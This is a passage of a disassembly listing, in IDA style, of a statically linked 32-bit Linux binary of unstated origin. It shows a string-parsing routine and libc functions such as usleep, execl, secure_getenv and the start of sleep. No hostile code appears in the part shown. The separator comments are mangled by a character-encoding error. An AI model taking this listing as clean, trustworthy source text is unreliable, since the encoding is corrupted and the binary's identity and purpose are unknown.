movzx eax, byte ptr [ebx+7] test byte ptr [edx+eax*2+1], 8 jz short loc_80554E8 movzx eax, byte ptr [ebx+8] test byte ptr [edx+eax*2+1], 8 jz short loc_80554E8 cmp byte ptr [ebx+9], 3Ah jnz short loc_80554E8 movzx eax, byte ptr [ebx+0Ah] test byte ptr [edx+eax*2+1], 8 jz short loc_80554E8 movzx eax, byte ptr [ebx+0Bh] test byte ptr [edx+eax*2+1], 8 jz short loc_80554E8 cmp byte ptr [ebx+0Ch], 3Ah jnz short loc_80554E8 movzx eax, byte ptr [ebx+0Dh] test byte ptr [edx+eax*2+1], 8 jz short loc_80554E8 movzx eax, byte ptr [ebx+0Eh] test byte ptr [edx+eax*2+1], 8 jz short loc_80554E8 cmp byte ptr [ebx+0Fh], 20h jnz short loc_80554E8 add ebx, 10h loc_80554E8: ; CODE XREF: sub_80553A0+9Fj ; sub_80553A0+AEj ... mov eax, ebx sub eax, [ebp+arg_0] mov esi, [ebp+arg_4] sub esi, eax mov [ebp+var_4], esi mov eax, esi dec eax cmp edi, eax jl short loc_8055514 push eax push ebx mov esi, [ebp+arg_8] push esi call bcopy mov esi, [ebp+var_4] mov byte ptr [ebx+esi-1], 0 jmp loc_80555A4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8055514: ; CODE XREF: sub_80553A0+15Aj push edi mov esi, [ebp+arg_8] push esi push ebx call sub_8056450 add esp, 0Ch test eax, eax jz short loc_80555A4 mov esi, [ebp+var_4] lea eax, [ebx+esi-1] sub eax, edi mov byte ptr [eax], 0 push 0 push ebx call strchr mov ecx, eax add esp, 8 cmp ecx, ebx jb short loc_8055599 lea edx, [ebx-1] mov eax, edx sub eax, ecx and eax, 3 cmp ecx, edx jle short loc_805556B test eax, eax jz short loc_8055578 cmp eax, 3 jge short loc_805556B cmp eax, 2 jge short loc_8055565 mov al, [ecx] mov [edi+ecx], al dec ecx loc_8055565: ; CODE XREF: sub_80553A0+1BDj mov al, [ecx] mov [edi+ecx], al dec ecx loc_805556B: ; CODE XREF: sub_80553A0+1AFj ; sub_80553A0+1B8j mov al, [ecx] mov [edi+ecx], al dec ecx cmp ecx, ebx jb short loc_8055599 db 8Dh,76h,0 ; lea esi, [esi+0] loc_8055578: ; CODE XREF: sub_80553A0+1B3j ; sub_80553A0+1F7j mov al, [ecx] mov [edi+ecx], al mov al, [ecx-1] mov [edi+ecx-1], al mov al, [ecx-2] mov [edi+ecx-2], al mov al, [ecx-3] mov [edi+ecx-3], al add ecx, 0FFFFFFFCh cmp ecx, ebx jnb short loc_8055578 loc_8055599: ; CODE XREF: sub_80553A0+1A1j ; sub_80553A0+1D3j push edi push ebx mov esi, [ebp+arg_8] push esi call bcopy loc_80555A4: ; CODE XREF: sub_80553A0+Dj ; sub_80553A0+17j ... lea esp, [ebp+var_10] pop ebx pop esi pop edi mov esp, ebp pop ebp retn sub_80553A0 endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 2 dup(90h) ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden usleep proc near ; CODE XREF: main+5B5p main+D89p ... var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 8 mov eax, [ebp+arg_0] mov ecx, 0F4240h xor edx, edx div ecx mov [ebp+var_8], eax mov edx, eax shl edx, 5 sub edx, eax mov eax, edx shl eax, 6 sub eax, edx shl eax, 3 add eax, [ebp+var_8] shl eax, 6 mov ecx, [ebp+arg_0] sub ecx, eax mov [ebp+var_4], ecx lea eax, [ebp+var_8] push eax ; timeout push 0 ; exceptfds push 0 ; writefds push 0 ; readfds push 1 ; n call select mov esp, ebp pop ebp retn usleep endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 3 dup(90h) ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden execl proc near ; CODE XREF: main+975p var_8004 = dword ptr -8004h var_8000 = dword ptr -8000h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = byte ptr 10h push ebp mov ebp, esp sub esp, 8000h push ebx mov ebx, [ebp+arg_0] mov eax, [ebp+arg_4] mov [ebp+var_8000], eax lea ecx, [ebp+arg_8] mov edx, 1 test eax, eax jz short loc_805564A lea esi, [esi] loc_8055620: ; CODE XREF: execl+4Cj cmp edx, 1FFFh jbe short loc_8055630 mov eax, 7 jmp short loc_805565D ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8055630: ; CODE XREF: execl+2Aj add ecx, 4 mov eax, [ecx-4] mov [ebp+edx*4+var_8000], eax mov eax, edx inc edx cmp [ebp+eax*4+var_8000], 0 jnz short loc_8055620 loc_805564A: ; CODE XREF: execl+20j mov eax, __environ push eax lea eax, [ebp+var_8000] push eax push ebx call execve loc_805565D: ; CODE XREF: execl+31j mov ebx, [ebp+var_8004] mov esp, ebp pop ebp retn execl endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden secure_getenv proc near ; CODE XREF: init_services_resolv+22p ; init_services_resolv+A63p ... var_C = byte ptr -0Ch arg_0 = dword ptr 8 push ebp mov ebp, esp push edi push esi push ebx mov esi, [ebp+arg_0] xor al, al mov edi, esi cld mov ecx, 0FFFFFFFFh repne scasb mov eax, ecx not eax lea edi, [eax-1] mov ebx, __environ cmp dword ptr [ebx], 0 jz short loc_80556B8 nop loc_8055690: ; CODE XREF: secure_getenv+4Ej push edi push esi mov eax, [ebx] push eax call strncmp add esp, 0Ch test eax, eax jnz short loc_80556B0 mov eax, [ebx] cmp byte ptr [edi+eax], 3Dh jnz short loc_80556B0 lea eax, [edi+1] add eax, [ebx] jmp short loc_80556BA ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80556B0: ; CODE XREF: secure_getenv+37j ; secure_getenv+3Fj add ebx, 4 cmp dword ptr [ebx], 0 jnz short loc_8055690 loc_80556B8: ; CODE XREF: secure_getenv+25j xor eax, eax loc_80556BA: ; CODE XREF: secure_getenv+46j lea esp, [ebp+var_C] pop ebx pop esi pop edi mov esp, ebp pop ebp retn secure_getenv endp ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden sub_80556C4 proc near ; DATA XREF: sleep+3Do push ebp mov ebp, esp mov esp, ebp pop ebp retn sub_80556C4 endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden sleep proc near ; CODE XREF: main+48Ap main+9C9p ... var_3C = byte ptr -3Ch var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = byte ptr -28h var_24 = dword ptr -24h var_20 = byte ptr -20h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 30h push edi push esi push ebx mov edi, [ebp+arg_0] mov ecx, __errno mov [ebp+var_30], ecx test edi, edi jnz short loc_80556EC xor eax, eax jmp loc_80557DD ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80556EC: ; CODE XREF: sleep+17j mov [ebp+var_24], 2000h lea eax, [ebp+var_28] push eax lea eax, [ebp+var_24] push eax push 0 call sigprocmask add esp, 0Ch test eax, eax jl short loc_8055734 mov [ebp+var_10], offset sub_80556C4 mov [ebp+var_C], 0 mov [ebp+var_8], 0 lea eax, [ebp+var_20] push eax lea eax, [ebp+var_10] push eax push 0Eh call sigaction add esp, 0Ch test eax, eax jge short loc_805573C loc_8055734: ; CODE XREF: sleep+3Bj mov eax, edi jmp loc_80557DD ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳